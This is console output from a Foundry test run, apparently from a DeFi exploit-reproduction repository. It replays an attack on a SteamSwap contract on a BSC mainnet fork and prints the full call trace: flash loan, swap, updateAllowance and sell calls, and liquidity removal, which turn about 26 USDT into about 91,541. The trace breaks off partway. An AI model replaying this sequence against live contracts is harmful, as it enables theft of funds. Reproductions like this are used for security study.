Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.31s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 598.26ms (1.76ms CPU time)

Ran 1 test for src/test/2024-06/SteamSwap_exp.sol:SteamSwap
[PASS] testExploit() (gas: 473182)
Logs:
  Attacker USDT Balance Before exploit: 26.542161622221038197
  Attacker USDT Balance After exploit: 91541.452128431815634032

Traces:
  [10740] SteamSwap::setUp()
    ├─ [0] VM::createSelectFork("bsc", 39381373 [3.938e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [572382] SteamSwap::testExploit()
    ├─ [3081] 0x55d398326f99059fF775485246999027B3197955::symbol() [staticcall]
    │   └─ ← [Return] "USDT"
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [2425] 0x55d398326f99059fF775485246999027B3197955::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker USDT Balance Before exploit", val: 26542161622221038197 [2.654e19], decimals: 18)
    ├─ [35983] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::sync()
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   └─ ← [Return] 91756641426462709287653 [9.175e22]
    │   ├─ [2930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   └─ ← [Return] 2740054541998103233948508 [2.74e24]
    │   ├─ emit Sync(reserve0: 91756641426462709287653 [9.175e22], reserve1: 2740054541998103233948508 [2.74e24])
    │   ├─  storage changes:
    │   │   @ 9: 0x0000000000000000000000000000010b0b1618dde7024dfccf94067ed556df9a → 0x0000000000000000000000000000010b0b6faf07f5432a48adf5d691fbadaee1
    │   │   @ 8: 0x6661f11f00000002443aa784041f53c9eb5c00000000136e23331dd8a1828ae5 → 0x6661f12200000002443aa784041f53c9eb5c00000000136e23331dd8a1828ae5
    │   │   @ 10: 0x0000000000000000000000000000000000adc8b0b244137871c39d3331f291e0 → 0x0000000000000000000000000000000000ade2688a270dc3d2e7b8f4bb4ae28b
    │   └─ ← [Stop]
    ├─ [486922] 0x92b7807bF19b7DDdf89b706143896d05228f3121::flash(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000000 [5e23], 0, 0x)
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x92b7807bF19b7DDdf89b706143896d05228f3121) [staticcall]
    │   │   └─ ← [Return] 16671231001740955212705048 [1.667e25]
    │   ├─ [9796] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x92b7807bF19b7DDdf89b706143896d05228f3121) [staticcall]
    │   │   ├─ [2553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x92b7807bF19b7DDdf89b706143896d05228f3121) [delegatecall]
    │   │   │   └─ ← [Return] 7135542802228066553357626 [7.135e24]
    │   │   └─ ← [Return] 7135542802228066553357626 [7.135e24]
    │   ├─ [8871] 0x55d398326f99059fF775485246999027B3197955::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000000 [5e23])
    │   │   ├─ emit Transfer(from: 0x92b7807bF19b7DDdf89b706143896d05228f3121, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 500000000000000000000000 [5e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x554fd3ef8b49f01dc63957408fd93bb26c62062a1025c95e3110e2975a20352a: 0x0000000000000000000000000000000000000000000dca453e5653fc59a1ed18 → 0x0000000000000000000000000000000000000000000d6064306eed858921ed18
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000017058b35e777da275 → 0x0000000000000000000000000000000000000000000069e27e4019d547fda275
    │   │   └─ ← [Return] true
    │   ├─ [434131] SteamSwap::pancakeV3FlashCallback(50000000000000000000 [5e19], 0, 0x)
    │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfa7586aee173f27765adbab9710c0768118b04dc080f7fd260294fab0947b27f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 500026542161622221038197 [5e23]
    │   │   ├─ [61800] 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702::swapExactTokensForTokensSupportingFeeOnTransferTokens(500026542161622221038197 [5e23], 0, [0x55d398326f99059fF775485246999027B3197955, 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0], SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1717695757 [1.717e9])
    │   │   │   ├─ [8834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, 500026542161622221038197 [5e23])
    │   │   │   │   ├─ emit Transfer(from: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, value: 500026542161622221038197 [5e23])
    │   │   │   │   ├─ emit Approval(owner: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, value: 115792089237316195423570985008687907853269984665640563539431041846290908601738 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000069e27e4019d547fda275 → 0
    │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x00000000000000000000000000000000000000000000136e23331dd8a1828ae5 → 0x000000000000000000000000000000000000000000007d50a17337ade9802d5a
    │   │   │   │   │   @ 0xfa7586aee173f27765adbab9710c0768118b04dc080f7fd260294fab0947b27f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffff961d81bfe62ab8025d8a
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [517] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 91756641426462709287653 [9.175e22], 2740054541998103233948508 [2.74e24], 1717694754 [1.717e9]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   └─ ← [Return] 591783183588084930325850 [5.917e23]
    │   │   │   ├─ [40408] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::swap(0, 2314306696936931019159509 [2.314e24], SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [26557] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2314306696936931019159509 [2.314e24])
    │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2314306696936931019159509 [2.314e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000001ea12d14325bea40777d5
    │   │   │   │   │   │   @ 0xbf8afd9434f7b858f55f76b048eab4533a0e3063633a55301dfa3d01f28c6cc0: 0x00000000000000000000000000000000000000000002443aa784041f53c9eb5c → 0x000000000000000000000000000000000000000000005a27d640de60afc27387
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   └─ ← [Return] 591783183588084930325850 [5.917e23]
    │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   └─ ← [Return] 425747845061172214788999 [4.257e23]
    │   │   │   │   ├─ emit Sync(reserve0: 591783183588084930325850 [5.917e23], reserve1: 425747845061172214788999 [4.257e23])
    │   │   │   │   ├─ emit Swap(sender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, amount0In: 500026542161622221038197 [5e23], amount1In: 0, amount0Out: 0, amount1Out: 2314306696936931019159509 [2.314e24], to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x6661f12200000002443aa784041f53c9eb5c00000000136e23331dd8a1828ae5 → 0x6661f122000000005a27d640de60afc27387000000007d50a17337ade9802d5a
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 2314306696936931019159509 [2.314e24]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [38798] 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6::updateAllowance()
    │   │   │   ├─ [7462] 0x55d398326f99059fF775485246999027B3197955::approve(0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, spender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x09bb3770c3bc8bdf31a9e5dfd731514bdc4755b3c3b976d48799406847475f6c: 0xffffffffffffffffffffffffffffffffffffffffffffec7c89da7f9fe9e7ffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [5261] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::approve(0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, spender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [24510] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::approve(0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, spender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x09bb3770c3bc8bdf31a9e5dfd731514bdc4755b3c3b976d48799406847475f6c: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [25161] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::approve(0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x722b27a61895f00632ac654779a049af61f2fe7619b549a51df2c20d9140e8c3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [85018] 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6::sell(788457284784675531947146 [7.884e23])
    │   │   │   ├─ [9165] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transferFrom(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 788457284784675531947146 [7.884e23])
    │   │   │   │   ├─ emit Transfer(from: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, value: 788457284784675531947146 [7.884e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000001ea12d14325bea40777d5 → 0x00000000000000000000000000000000000000000001431c765e57d03f74fb4b
    │   │   │   │   │   @ 0x015ac9fc116709840380b242812ad3cfa1bf6d68a05fa6139a260157ba46861c: 0x00000000000000000000000000000000000000000005977960a896b225b614a4 → 0x000000000000000000000000000000000000000000063e6fbb8d64a08a48912e
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [517] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 591783183588084930325850 [5.917e23], 425747845061172214788999 [4.257e23], 1717694754 [1.717e9]
    │   │   │   ├─ [2432] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 499338331500868972567582 [4.993e23]
    │   │   │   ├─ [70460] 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702::removeLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0, 462371036766512398783797 [4.623e23], 0, 0, SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1717694754 [1.717e9])
    │   │   │   │   ├─ [30133] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::transferFrom(0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, 462371036766512398783797 [4.623e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, to: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, value: 462371036766512398783797 [4.623e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0 → 0x0000000000000000000000000000000000000000000061e92f23006619d4d535
    │   │   │   │   │   │   @ 0x28006f1c78019f3c37312abdc3ff9cddfb701637112f0f5e47e8e1f6815f185e: 0x0000000000000000000000000000000000000000000069bd2f68ac2ca5bfd836 → 0x0000000000000000000000000000000000000000000007d40045abc68beb0301
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [37716] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::burn(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 591783183588084930325850 [5.917e23]
    │   │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 425747845061172214788999 [4.257e23]
    │   │   │   │   │   ├─ [2338] 0xF429BE07D1BA18DCd48AF91423c2f075b30F7E50::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: 0x0000000000000000000000000000000000000000, value: 462371036766512398783797 [4.623e23])
    │   │   │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 547971959841689024231979 [5.479e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 547971959841689024231979 [5.479e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x000000000000000000000000000000000000000000007d50a17337ade9802d5a → 0x00000000000000000000000000000000000000000000094702dde3890e6db32f
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000074099e955424db127a2b
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3857] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 394228642392337765973572 [3.942e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 394228642392337765973572 [3.942e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbf8afd9434f7b858f55f76b048eab4533a0e3063633a55301dfa3d01f28c6cc0: 0x000000000000000000000000000000000000000000005a27d640de60afc27387 → 0x0000000000000000000000000000000000000000000006aca8ce77697d793543
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000001431c765e57d03f74fb4b → 0x000000000000000000000000000000000000000000019697a3d0bec771be398f
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 43811223746395906093871 [4.381e22]
    │   │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 31519202668834448815427 [3.151e22]
    │   │   │   │   │   ├─ emit Sync(reserve0: 43811223746395906093871 [4.381e22], reserve1: 31519202668834448815427 [3.151e22])
    │   │   │   │   │   ├─ emit Burn(sender: 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702, amount0: 547971959841689024231979 [5.479e23], amount1: 394228642392337765973572 [3.942e23], to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x0000000000000000000000000000000000000000000061e92f23006619d4d535 → 0
    │   │   │   │   │   │   @ 8: 0x6661f122000000005a27d640de60afc27387000000007d50a17337ade9802d5a → 0x6661f1220000000006aca8ce77697d79354300000000094702dde3890e6db32f
    │   │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000069bd2f68ac2ca5bfdc1e → 0x0000000000000000000000000000000000000000000007d40045abc68beb06e9
    │   │   │   │   │   └─ ← [Return] 547971959841689024231979 [5.479e23], 394228642392337765973572 [3.942e23]
    │   │   │   │   └─ ← [Return] 547971959841689024231979 [5.479e23], 394228642392337765973572 [3.942e23]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [60118] 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6::sell(58404243317383372736827 [5.84e22])
    │   │   │   ├─ [4365] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transferFrom(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 58404243317383372736827 [5.84e22])
    │   │   │   │   ├─ emit Transfer(from: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, value: 58404243317383372736827 [5.84e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000019697a3d0bec771be398f → 0x000000000000000000000000000000000000000000018a398a1e9c8fdc123054
    │   │   │   │   │   @ 0x015ac9fc116709840380b242812ad3cfa1bf6d68a05fa6139a260157ba46861c: 0x000000000000000000000000000000000000000000063e6fbb8d64a08a48912e → 0x000000000000000000000000000000000000000000064acdd53f86d81ff49a69
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [517] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 43811223746395906093871 [4.381e22], 31519202668834448815427 [3.151e22], 1717694754 [1.717e9]
    │   │   │   ├─ [432] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 36967294734356573783785 [3.696e22]
    │   │   │   ├─ [52360] 0x0ff0eBC65deEe10ba34fd81AfB6b95527be46702::removeLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0, 34249706427149066576577 [3.424e22], 0, 0, SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1717694754 [1.717e9])
    │   │   │   │   ├─ [23333] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::transferFrom(0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, 34249706427149066576577 [3.424e22])
    │   │   │   │   │   ├─ emit Transfer(from: 0xb7D0A1aDaFA3e9e8D8e244C20B6277Bee17a09b6, to: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, value: 34249706427149066576577 [3.424e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x28006f1c78019f3c37312abdc3ff9cddfb701637112f0f5e47e8e1f6815f185e: 0x0000000000000000000000000000000000000000000007d40045abc68beb0301 → 0x000000000000000000000000000000000000000000000093521d27015a98e040
    │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0 → 0x000000000000000000000000000000000000000000000740ae2884c5315222c1
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [26416] 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C::burn(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 43811223746395906093871 [4.381e22]
    │   │   │   │   │   ├─ [930] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::balanceOf(0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 31519202668834448815427 [3.151e22]
    │   │   │   │   │   ├─ [338] 0xF429BE07D1BA18DCd48AF91423c2f075b30F7E50::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: 0x0000000000000000000000000000000000000000, value: 34249706427149066576577 [3.424e22])
    │   │   │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 40590515543828816609775 [4.059e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2E45AEf311706e12D48552d0DaA8D9b8fb764B1C, to: SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 40590515543828816609775 [4.059e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x90fe774411e7bd863cdc4babd9c859ed1324a469472e49606a73615ab10edc72: 0x00000000000000000000000000000000000000000000094702dde3890e6db32f → 0x0000000000000000000000000000000000000000000000ae984e1630fe337140
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000074099e955424db127a2b → 0x000000000000000000000000000000000000000000007ca20925217ceb4cbc1a
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3857] 0xBd0DF7D2383B1aC64afeAfdd298E640EfD9864e0::transfer(SteamSwap: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 29202121658691686368413 [2.92e22])
